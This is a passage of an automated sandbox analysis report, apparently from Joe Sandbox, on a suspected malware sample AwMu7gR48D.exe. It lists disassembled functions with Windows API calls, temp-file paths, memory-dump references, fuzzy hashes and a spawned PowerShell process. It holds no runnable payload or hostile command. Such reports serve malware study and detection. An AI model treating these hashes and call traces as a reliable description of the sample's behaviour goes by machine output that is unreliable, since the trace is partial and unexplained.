lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspE492.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A08
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76F93410,C:\Users\user\AppData\Local\Temp\), ref: 00405A18

Strings

C:\Users\user\AppData\Local\Temp\nspE492.tmp, xrefs: 004059BB, 004059C0, 004059C6, 00405A01, 00405A07, 00405A0F, 00405A17
C:\Users\user\AppData\Local\Temp\, xrefs: 004059B5

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nspE492.tmp
API String ID: 3248276644-629276157
Opcode ID: 1798501a893aa51cf33724b967df125bb5b79cc73e901e6a487cbcc52799f4ac
Instruction ID: 1994e1ad2c5e9883225bba15f0e05bd5e2410f9dbe362fa4db8952c1f9a8588a
Opcode Fuzzy Hash: 1798501a893aa51cf33724b967df125bb5b79cc73e901e6a487cbcc52799f4ac
Instruction Fuzzy Hash: B3F04CB6205D5296C622333A1C066EF2A55CE86334719463FF891B13D2DB3C8913DD7E

Function 004058C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031A8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004058CD
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031A8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004058D6
lstrcatA.KERNEL32(?,00409014,?,00000006,00000008,0000000A), ref: 004058E7

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004058C7

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-297319885
Opcode ID: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
Instruction ID: 8ecb161afe92f8f98ec5c140421c9a6f3833b5d00e23c8f539a5f8bbe46d8a58
Opcode Fuzzy Hash: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
Instruction Fuzzy Hash: B0D0A962A05D302BD20273159C05E8F2A0CCF12740B0400B2F200B22E2C63C4D428FFE

Function 00402BB4 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
RegCloseKey.ADVAPI32(?), ref: 00402C22
RegCloseKey.ADVAPI32(?), ref: 00402C43

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 92a6906e664bbcb47ab1ca28fdd4f13aa4067a21e5a0486ffc58b8f5881c376e
Instruction ID: 05bed6b59ed8188e40eca3efb14264cb36eb805b2849730c7d7757a09cb5f5a9
Opcode Fuzzy Hash: 92a6906e664bbcb47ab1ca28fdd4f13aa4067a21e5a0486ffc58b8f5881c376e
Instruction Fuzzy Hash: BC115B32504119FBEF01AF51CE09B9E7B7AEF14351F104072BA05B50E0E7B5EE52AA68

Function 00405960 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspE492.tmp,?,004059CC,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040596E
CharNextA.USER32(00000000), ref: 00405973
CharNextA.USER32(00000000), ref: 00405987

Strings

C:\Users\user\AppData\Local\Temp\nspE492.tmp, xrefs: 00405961

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nspE492.tmp
API String ID: 3213498283-2162577230
Opcode ID: 78caeea6086e6eed9a212387893711d8897386d9b52ffe3bd3d136e2934aa6d1
Instruction ID: 9bd73c2178bbc4ada55c293d8cea80d9ef0b2d457d60247f238fee92507865f8
Opcode Fuzzy Hash: 78caeea6086e6eed9a212387893711d8897386d9b52ffe3bd3d136e2934aa6d1
Instruction Fuzzy Hash: CDF096D1904F60AEFB3252684C44B779F89CB56771F18447BE940B62C1C27C48418FEB

Function 00402CE4 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402EC4,00000001), ref: 00402CF7
GetTickCount.KERNEL32 ref: 00402D15
CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D32
ShowWindow.USER32(00000000,00000005), ref: 00402D40

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: f4337ae7c9a0c2b393fe5f11cb57febad8f5df9eb2ad2e71e21657c922240b80
Instruction ID: 46e63a0393c595c386a212d898ebec3da19c13aa57c3e66a4565427f31a4a510
Opcode Fuzzy Hash: f4337ae7c9a0c2b393fe5f11cb57febad8f5df9eb2ad2e71e21657c922240b80
Instruction Fuzzy Hash: 09F05E70906221ABDA207F20BE4CACA7BA4FB45B527024576F445B11E4C779888ACBDD

Function 00404FCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404FF9
CallWindowProcA.USER32(?,?,?,?), ref: 0040504A

Part of subcall function 0040403C: SendMessageA.USER32(000103FE,00000000,00000000,00000000), ref: 0040404E

Strings

, xrefs: 00404FDA

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: e712e2a543f08d2e54f60ba561f502afcf318598cb166087ec4cd0ddecdd3944
Instruction ID: a223dd13e6372a4dd0479c59c93eb21e0d8a99a0ac54a5c20384062b78d82a0f
Opcode Fuzzy Hash: e712e2a543f08d2e54f60ba561f502afcf318598cb166087ec4cd0ddecdd3944
Instruction Fuzzy Hash: F1017171104609EBEF205F51DD81A9F3A29EB84795F204037FA01B62D1D77A8C51AAAE

Function 004036EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,76F93410,00000000,C:\Users\user\AppData\Local\Temp\,004036C2,004034DC,?,?,00000006,00000008,0000000A), ref: 00403704
GlobalFree.KERNEL32(00000000), ref: 0040370B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004036EA

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-297319885
Opcode ID: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
Instruction ID: b677e6ccb62fb367f72670c3ce7c034f3dd0af87a7da7d41c05298a088c6e355
Opcode Fuzzy Hash: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
Instruction Fuzzy Hash: C6E01233815121ABC7356F5BED04B5A77687F45B22F058466EC407B3A0CB746C418FD9

Function 0040590E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\AwMu7gR48D.exe,C:\Users\user\Desktop\AwMu7gR48D.exe,80000000,00000003), ref: 00405914
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\AwMu7gR48D.exe,C:\Users\user\Desktop\AwMu7gR48D.exe,80000000,00000003), ref: 00405922

Strings

C:\Users\user\Desktop, xrefs: 0040590E

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-2743851969
Opcode ID: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
Instruction ID: 79756b3271e31ddeb9bc27b600d1c90533e2d507c88bbc01e3e6e8e0ac64b055
Opcode Fuzzy Hash: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
Instruction Fuzzy Hash: 1BD0C7B2419D706EE34373559C04B9F6A49DF56750F0904A2E140A61D1C67C5D414BAD

Function 00405A2D Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A3D
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A55
CharNextA.USER32(00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A66
lstrlenA.KERNEL32(00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A6F

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
Instruction ID: 6224e523b18aba5be362eaca93d7d04149ef311f73b073555fcbd801f46ec3cb
Opcode Fuzzy Hash: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
Instruction Fuzzy Hash: 68F0C232604458AFC712DBA4CC40D9EBBA8EF46350B2541A5E800F7251D234EE019FA9

Analysis Process: powershell.exePID: 6076, Parent PID: 1992COMMON

Executed Functions

Function 0758D55C Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0293d121c224c6267c1abc5db729d273314b35afdc9bf51d3a1184eb62211351
Instruction ID: f099f309eaba7ed2cf9fb82954a56c0f562157e248ba401b551d0d038359851b
Opcode Fuzzy Hash: 0293d121c224c6267c1abc5db729d273314b35afdc9bf51d3a1184eb62211351
Instruction Fuzzy Hash: 69E139B4B00319DFEBA0DB64C944BDAB7B2BB8A304F1081A5D5096F791CA36DD81CF55

Function 07584D68 Relevance: 1.1, Instructions: 1098COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dcd0cf16de3d14f106eddf3b68b96f0e611e84c3acb9a5fac54129ff168b827
Instruction ID: 24babbcd7e6465b9862962294e8eb97ee9fac98af89c06c71c7b3e6777aef381
Opcode Fuzzy Hash: 3dcd0cf16de3d14f106eddf3b68b96f0e611e84c3acb9a5fac54129ff168b827
Instruction Fuzzy Hash: 23A28EB0A00205CFE764DBA4C544BDABBB2BB89718F20C16AD9056F351DB76ED42CF81

Function 07583278 Relevance: 1.0, Instructions: 978COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ee5ee4771e4a784aad226f7d2a9635572e128de206420504465ba5d70cd1a33
Instruction ID: 0cdee3795a7dbaea2bee6c5b6694d01f1efa2e4d3969f7d3eeb1406bb13fea98
Opcode Fuzzy Hash: 3ee5ee4771e4a784aad226f7d2a9635572e128de206420504465ba5d70cd1a33
Instruction Fuzzy Hash: 6E82AEB0B00215DFEB50DB58C940BEEBBB2BB89714F14C0AAD909AF351DB75DD428B91

Function 07584D4A Relevance: .9, Instructions: 887COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2df335c5c906db814abdf33a8f2e96eaee91904cf1d54e904fdba7b3c490088
Instruction ID: b94b3e9f643cf85090d0ba0946aead2ecccbdcbe29957fb812bd75fb29a7a7ed
Opcode Fuzzy Hash: b2df335c5c906db814abdf33a8f2e96eaee91904cf1d54e904fdba7b3c490088
Instruction Fuzzy Hash: 4D828EB4A10205DFEB20DB64C544BDABBB2FB49309F24856AD9016F352DB76ED42CF81

Function 075840A2 Relevance: .6, Instructions: 644COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69bbe95acf4b4bf28ceb9822df3c0e157254452a2837e2410dec50f86c45ed40
Instruction ID: ac2aba493508749a206b6032f88db98e38f1f5bc187ac1e0a7f7dac5af9496fe
Opcode Fuzzy Hash: 69bbe95acf4b4bf28ceb9822df3c0e157254452a2837e2410dec50f86c45ed40
Instruction Fuzzy Hash: 2C528EB0B00215DFE760DB18C940B9AB7B2FB89714F10C099E909AF355DB76ED828F95

Function 0758D023 Relevance: .6, Instructions: 621COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd7741371960231647b18ca7623f226c4c608b8071d5cf0a2c6e3f9571dd5daa
Instruction ID: 5aab4040423e6b329f843d1c02af522930bd4344f7b97a3dedf8fd6a5be0c776
Opcode Fuzzy Hash: bd7741371960231647b18ca7623f226c4c608b8071d5cf0a2c6e3f9571dd5daa
Instruction Fuzzy Hash: A3423DB0B00214DFE764DB58C950BDAB7F2BB8A714F10C195E9096F391CA72ED828F95

Function 07581228 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce85e18fc0864f31df6418f0242cb9038602e47d053468971ac718ccd91ca55
Instruction ID: f7a1af6991fc11c408daea5304675f74ca4d40b7747c3058cf4754e0d7004f61
Opcode Fuzzy Hash: 5ce85e18fc0864f31df6418f0242cb9038602e47d053468971ac718ccd91ca55
Instruction Fuzzy Hash: 52329DB0B006489FE754DB98C441BDAB7F2BB86714F14C06AE905AF761DB72EC42CB91

Function 0758C830 Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d8047853ba96c791294eb052f233fc074890ffe530f949600ad81ea9f831002
Instruction ID: 96125be89a7483eeff1474439e51a069627cb62d6bbb69ef3cf3c2192f58c9d2
Opcode Fuzzy Hash: 4d8047853ba96c791294eb052f233fc074890ffe530f949600ad81ea9f831002
Instruction Fuzzy Hash: 6B225FB0B00214DFE764DB58C950BDAB7B2BF8A714F108195E9096F391CB72ED828F95

Function 075841B4 Relevance: .5, Instructions: 487COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af99d1c814a164dcbe55a387b341724a9be72619cc5482581aaee186cec14a70
Instruction ID: 75d1363ca411967b5f4e370a76d2d946cc65bc7f05137efb09bdc2a4ffb9a980
Opcode Fuzzy Hash: af99d1c814a164dcbe55a387b341724a9be72619cc5482581aaee186cec14a70
Instruction Fuzzy Hash: 50226DB0B00215DFEB50DB14C944B9AB7B2BF89714F10C099E909AF395CB76ED828F95

Function 0758D10A Relevance: .5, Instructions: 468COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef5ed57d95e93a506cec4c34ff9466fa431431ae1953bb71802fa4453ce87000
Instruction ID: eb7735b730102bdaa168539e91173b5d64ef1b336b36df131674282ed1109b7a
Opcode Fuzzy Hash: ef5ed57d95e93a506cec4c34ff9466fa431431ae1953bb71802fa4453ce87000
Instruction Fuzzy Hash: B9123EB0B00214DFE764DB58C950BDAB7B2BB8A714F108195E9096F391CB72ED828F95

Function 09010E28 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1861282960.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ab421e67da7945e756ff5b1e735e0163580f5e61048f5a5e6172ae5015cb5ac
Instruction ID: 26a220aebd3eaa085f803f7ce18e036aaa805c90354e803d22997f1a0f4fa47c
Opcode Fuzzy Hash: 2ab421e67da7945e756ff5b1e735e0163580f5e61048f5a5e6172ae5015cb5ac
Instruction Fuzzy Hash: 3EF10834A05209DFDB45CF98D484AAEBBF2FF88324F258559E905AB365C731ED81CB90

Function 09011800 Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1861282960.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38269b00e898ed43f6969d8f0e692a01c79bb3fd07f6f533a180e20706869593
Instruction ID: 17160183286e7bff0aa997f9239763cfdc962962b931757033eaff8de14cae6b
Opcode Fuzzy Hash: 38269b00e898ed43f6969d8f0e692a01c79bb3fd07f6f533a180e20706869593
Instruction Fuzzy Hash: 22F12734A052099FDB49CF98D484AADBBF2FF88320F248559E915AB365C735ED81CB90

Function 09010468 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1861282960.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5da26cb718de7d868e6305175e7dd96bea80cc94d0241c317be5a970b8b1684b
Instruction ID: a548b517b84481e23907b6fbd569e5fffb1715aee9af3dcc17b4478677c8c0d4
